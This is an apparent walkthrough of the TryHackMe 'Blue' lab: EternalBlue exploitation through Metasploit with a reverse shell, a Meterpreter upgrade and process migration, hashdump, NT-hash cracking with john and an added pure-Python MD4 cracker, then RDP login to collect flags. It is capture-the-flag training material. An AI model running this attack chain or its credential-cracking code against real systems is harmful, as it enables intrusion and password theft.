Blue


Blue is the second room in the Offensive Security path on TryHackMe. Below is my walkthrough for the tasks for this room.

Task 1 Hints
  • Have you deployed the machine and clicked on complete?
  • What popular port scanner can be used to answer the 2nd and 3rd questions for this task?
Task 2 Hints
  • Follow the information mentioned and launch Metasploit
  • How do you search for exploits in Metasploit?
  • What would you search for in this case?
Task 3 Hints
  • What post exploitation modules can be used to convert a TCP Shell to Meterpreter (Google it!)
  • Make sure you set the appropriate options!
  • Make sure your migrate step utilizes the correct system architecture.
Task 4 Hints
  • Two popular tools can be used to crack this password with a rather popular password list.
  • Make sure to indicate the correct hash format to crack the password.
Task 5 Hints
  • Follow the hints provided to uncover the 3 flags!


Full Walkthrough

Task 1

Question 1

No answer is needed, just deploy the machine!

Question 2

Blue Task 1 Question 2

This can easily be answered by running:

threader3000

This will supply all of the open TCP ports on the box:

Blue threader3000

Based on the results, the answer is 3: the open ports with a number under 1000 are 135, 139 and 445. (RDP on 3389, which the Task 5 connection relies on, is also open but sits above the threshold the question sets.)

Question 3

Blue Task 1 Question 3

Let’s run nmap on this box with the following parameters:

nmap -p135,139,445 --script vuln <victim ip>

This runs nmap's vuln NSE script category against those three ports and reports any vulnerability the scripts can confirm. Because 445 is open, the smb-vuln-ms17-010 script is among the ones that run.

Blue nmap vuln script

In the output above, you will see both the CVE for this vulnerability (CVE-2017-0143) and Microsoft's bulletin designation (ms17-010). The bulletin name, in the ms??-??? form the question asks for, is the answer.
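Counting ports by eye is fine for three of them, but both questions in this task are easier to answer reliably from nmap's XML output (-oX). The following is an added example, not code from the original walkthrough: it parses a constructed nmap XML document modelled on this box (the three ports under 1000, plus 3389, which the RDP step in Task 5 depends on), counts open TCP ports under the question's threshold, and pulls the CVE and its state out of the smb-vuln-ms17-010 host-script result. The sample XML, the 10.10.10.10 address and the function names are assumptions of the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -oX` output for a host like the Blue box. Real
# output carries many more attributes; only what the parser needs is kept.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap">
  <host>
    <address addr="10.10.10.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="closed"/><service name="http"/></port>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="49152"><state state="open"/><service name="unknown"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""


def open_tcp_ports(xml_text):
    """Return the sorted list of TCP ports whose <state> is 'open'."""
    root = ET.fromstring(xml_text)
    ports = []
    for port in root.iter("port"):
        state = port.find("state")
        if port.get("protocol") == "tcp" and state is not None and state.get("state") == "open":
            ports.append(int(port.get("portid")))
    return sorted(ports)


def count_open_ports_below(xml_text, limit=1000):
    """Answer the 'how many open ports under N' style of question."""
    return sum(1 for p in open_tcp_ports(xml_text) if p < limit)


def vuln_findings(xml_text):
    """Collect (script id, CVE, state) triples from NSE vuln-script results.

    The smb-vuln-* scripts report one <table key="CVE-..."> per finding with a
    child <elem key="state"> of VULNERABLE, LIKELY VULNERABLE or NOT VULNERABLE.
    """
    findings = []
    root = ET.fromstring(xml_text)
    for script in root.iter("script"):
        for table in script.findall("table"):
            key = table.get("key", "")
            if not key.startswith("CVE-"):
                continue
            state = table.find("elem[@key='state']")
            findings.append((script.get("id"), key, state.text if state is not None else "unknown"))
    return findings


def ms_bulletin(script_id):
    """Extract the Microsoft bulletin name (ms??-???) embedded in an NSE script id."""
    match = re.search(r"ms\d{2}-\d{3}", script_id)
    return match.group(0) if match else None


if __name__ == "__main__":
    print("open ports:", open_tcp_ports(SAMPLE_NMAP_XML))
    print("open ports under 1000:", count_open_ports_below(SAMPLE_NMAP_XML))
    for script_id, cve, state in vuln_findings(SAMPLE_NMAP_XML):
        print(f"{ms_bulletin(script_id)} ({cve}): {state}")
```

Against a real scan, replace SAMPLE_NMAP_XML with the contents of the file written by `nmap -p135,139,445 --script vuln -oX scan.xml <victim ip>`; the state field matters because the script distinguishes a confirmed VULNERABLE result from a guess.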

Task 2

Question 1

No answer needed, just launch Metasploit with:

msfconsole

Question 2

Blue Task 2 Question 2

Once Metasploit has been launched, run the following to see all the exploits for the ms17-010 vulnerability:

search ms17-010

Several results will appear as shown below:

Blue metasploit search ms17-010

The answer to this question is option 2 on this list exploit/windows/smb/ms17_010_eternalblue.

Question 3

The next question asks you which option needs to be set for this exploit:

Blue Task 2 Question 3

This can be found by running the following within Metasploit:

show options

Blue metasploit show options

The answer is RHOSTS, the target address, which is the only required option with no default. Set it with:

set RHOSTS <victim ip>

and then set LHOST (the address the reverse shell connects back to) to your VPN interface:

set LHOST tun0

Blue metasploit set rhosts lhost

Question 4

With this set, type in either:

run or exploit

You should see output similar to that shown below:

Blue metasploit eternalblue exploit

Question 5

No answer is needed for this question. The exploit is not reliable every time, so the room is warning you that if it fails you may have to reboot the target VM and run it again.

Task 3

Question 1

Blue Task 3 Question 1

As mentioned above, background your shell with:

CTRL + Z and then answer y to the prompt to background your session.

Blue metasploit background session 1

For the post exploitation module, I did some Googling on shell to meterpreter, and came across this article, which provides the answer to this question (post/multi/manage/shell_to_meterpreter).

Blue metasploit post exploitation shell to meterpreter

Question 2

Blue Task 3 Question 2

This next section asks you which option we’re required to change. Let’s run:

show options and you will notice a SESSION field.

Blue metasploit shell to meterpreter show options

Question 3

This needs to be modified to match the session number of your backgrounded session. Set this with:

set SESSION <session #>

Blue metasploit set session

Once done, use either:

run

or

exploit

to gain a Meterpreter shell.

Question 4

No answer needed, if this doesn’t work, you might have to redo all of the prior steps in Metasploit.

Question 5

In order to know which session to select, run sessions -l to list all current active sessions in Metasploit.

Blue metasploit list active sessions

You will notice 2 sessions: 1 with your reverse TCP shell, and another one with your Meterpreter shell. In this case, run the following to interact with the Meterpreter shell:

sessions -i 2

Question 6

This question asks you to run:

shell

to launch a shell on the remote machine followed by:

whoami

to confirm you are the NT AUTHORITY\SYSTEM user.

Blue metasploit interact with session

Question 7

Next, let’s background this shell with:

CTRL+Z followed by y

Next, run:

ps

to list processes running on the victim machine:

Blue metasploit ps

Question 8

We already have SYSTEM, as whoami confirmed, so the goal of migrating is stability rather than privilege: the session currently lives in the process the exploit landed in, and moving into a long-lived process that also runs as NT AUTHORITY\SYSTEM keeps our privileges while making the session less likely to die underneath us. Pick a process whose architecture matches your Meterpreter (x64 in this case), avoid the ones Windows cannot survive losing, and expect a failed attempt or two. Migration is attempted with:

migrate <PID>

where PID is the process ID listed in the first column of the ps output. A successful migration (after a few attempts) is shown below:

Blue metasploit migrate
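Choosing a migration target from a long ps listing is the step that most often goes wrong, so here is an added example (not the walkthrough's own code) that applies the criteria above mechanically: it parses a constructed Meterpreter ps listing, keeps only processes running as NT AUTHORITY\SYSTEM with the x64 architecture of our session, and drops the processes whose death would take the box down with it. The sample listing, the PIDs, the JON-PC hostname and the critical-process list are assumptions of the example, not output from the target.

```python
import re

# Constructed Meterpreter `ps` listing in the column layout the command prints
# (PID, PPID, Name, Arch, Session, User, Path). PIDs, the JON-PC hostname and
# the mix of processes are invented for the example, not taken from the target.
SAMPLE_PS = r"""
Process List
============

 PID   PPID  Name              Arch  Session  User                          Path
 ---   ----  ----              ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System            x64   0
 416   4     smss.exe          x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 500   492   csrss.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 540   492   wininit.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 588   492   winlogon.exe      x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 604   540   lsass.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 796   604   svchost.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 860   604   svchost.exe       x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 1232  604   spoolsv.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1888  796   cmd.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\cmd.exe
 2044  2012  explorer.exe      x64   1        JON-PC\Jon                    C:\Windows\Explorer.EXE
"""

# Only rows that carry every column are useful as migration targets; kernel
# pseudo-processes without a user or path are skipped by this pattern.
ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(.+?)\s+(x64|x86)\s+(\d+)\s+(.+?)\s+(\S+)\s*$")

# Assumed list of processes a failed injection must never touch: losing any of
# them crashes or locks the machine, and lsass additionally holds credentials.
CRITICAL_PROCESSES = {"smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe"}


def parse_ps(text):
    """Turn the `ps` listing into a list of dicts, one per fully described process."""
    procs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        pid, ppid, name, arch, session, user, path = m.groups()
        procs.append({
            "pid": int(pid), "ppid": int(ppid), "name": name, "arch": arch,
            "session": int(session), "user": user, "path": path,
        })
    return procs


def migration_candidates(procs, arch="x64", user=r"NT AUTHORITY\SYSTEM"):
    """Processes safe to `migrate` into: right user, right architecture, not critical."""
    return [
        p for p in procs
        if p["arch"] == arch and p["user"] == user and p["name"].lower() not in CRITICAL_PROCESSES
    ]


if __name__ == "__main__":
    for p in migration_candidates(parse_ps(SAMPLE_PS)):
        print(f"migrate {p['pid']}  # {p['name']} ({p['arch']}, {p['user']})")
```

In the sample, cmd.exe is excluded despite running as SYSTEM because it is a 32-bit process, and the SYSTEM svchost.exe survives while its NETWORK SERVICE sibling with the same name does not; both are exactly the distinctions the hint about architecture and user is pointing at.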

Task 4

Question 1

Next, we’re going to dump all the passwords on the victim machine. Follow the information provided in the question as shown below and run:

hashdump


You should see output similar to that shown below, and there is one non-default user listed in this case, Jon.

Blue metasploit hashdump

Question 2

Blue Task 4 Question 2

Let's crack this password with john. Each hashdump line uses the pwdump layout user:RID:LM hash:NT hash:::, and john reads that layout directly, so on your attacker machine copy the full line for the Jon user and echo it into a file with:

echo Jon:1000:....::: > hashes

Next, let's run:

john hashes --wordlist=/usr/share/wordlists/rockyou.txt --format=NT

The --format=NT flag tells john to treat the fourth field as an NT hash (unsalted MD4 over the UTF-16LE password) instead of guessing the format, and the rockyou wordlist supplies the candidates. After a couple of minutes, the user's password will be displayed:

Blue John
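To see what --format=NT is actually telling john, here is an added example (not code from the walkthrough): an NT hash is MD4 over the UTF-16LE encoding of the password, with no salt, so cracking is nothing more than hashing each candidate and comparing. The block implements MD4 in pure Python (hashlib's md4 is unavailable on many modern OpenSSL builds), parses a hashdump line in the user:RID:LM:NT::: layout, and runs a constructed four-word wordlist against a constructed hash: the NT hash of "password", with the all-empty LM hash in the LM field, which is what hashdump shows when LM storage is disabled. The line, the wordlist and the function names are assumptions of the example; Jon's real hash and password are not reproduced here.

```python
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), used because hashlib.new('md4') often fails
    on OpenSSL 3 builds where the legacy provider is not loaded."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    # (round function, message word order, per-step shifts, additive constant)
    rounds = (
        (f, tuple(range(16)), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    bit_len = len(data) * 8
    # Padding: 0x80, zeros up to 56 mod 64, then the bit length as 64-bit little-endian.
    data = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        v = state[:]
        for func, order, shifts, const in rounds:
            for i in range(16):
                t = (-i) % 4  # cycles through a, d, c, b as in the RFC's operation tables
                acc = (v[t] + func(v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4])
                       + x[order[i]] + const) & MASK
                v[t] = _rotl(acc, shifts[i % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash: MD4 of the UTF-16LE password, no salt, rendered as lowercase hex."""
    return md4(password.encode("utf-16le")).hex()


def parse_hashdump_line(line: str):
    """Split a hashdump/pwdump line (user:RID:LM:NT:::) into its fields."""
    user, rid, lm, nt = line.strip().rstrip(":").split(":")
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def crack_nt(nt_hex: str, wordlist):
    """Return the first candidate whose NT hash matches, or None."""
    target = nt_hex.lower()
    for word in wordlist:
        if nt_hash(word) == target:
            return word
    return None


# Constructed sample line: empty-LM marker plus the well-known NT hash of "password".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
SAMPLE_LINE = "Jon:1000:" + EMPTY_LM + ":8846f7eaee8fb117ad06bdd830b7586c:::"
SAMPLE_WORDLIST = ["123456", "letmein", "password", "qwerty"]  # constructed stand-in for rockyou

if __name__ == "__main__":
    entry = parse_hashdump_line(SAMPLE_LINE)
    print(entry["user"], "->", crack_nt(entry["nt"], SAMPLE_WORDLIST))
```

The absence of a salt is why a wordlist attack on NT hashes is so cheap: every candidate is hashed once and compared against every dumped hash, and precomputed tables work too. That is also why john needs to be told the format rather than left to guess, since a 32-hex-character MD4 and a raw MD5 look identical on the wire.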

Task 5

Question 1

Let's connect to this machine over Remote Desktop (RDP, TCP 3389) with remmina. Once it launches, fill in the IP address of your victim machine along with the user (Jon) and the password you cracked in the previous question.

Blue Remmina rdp

After a couple moments, you will be presented with Jon’s desktop as shown below.

Blue Remmina Windows Desktop

Let’s start looking for flags.

Blue Task 5 Question 1

On Windows, the root of the system drive is C:\. Let's open File Explorer and look around:

Blue flag1

The first flag is located here in the flag1.txt file.

Question 2

Blue Task 5 Question 2

The question also provides a hint: the flag is in C:\Windows\System32\config, the directory that holds the registry hives, including the SAM hive in which Windows stores the local account password hashes that hashdump pulled earlier.

Blue flag2

Question 3

Blue Task 5 Question 3

The final flag is located in C:\Users\Jon\My Documents (Jon is an administrator, so his profile is the obvious place to loot).

Blue flag3

That’s it! All flags have been uncovered!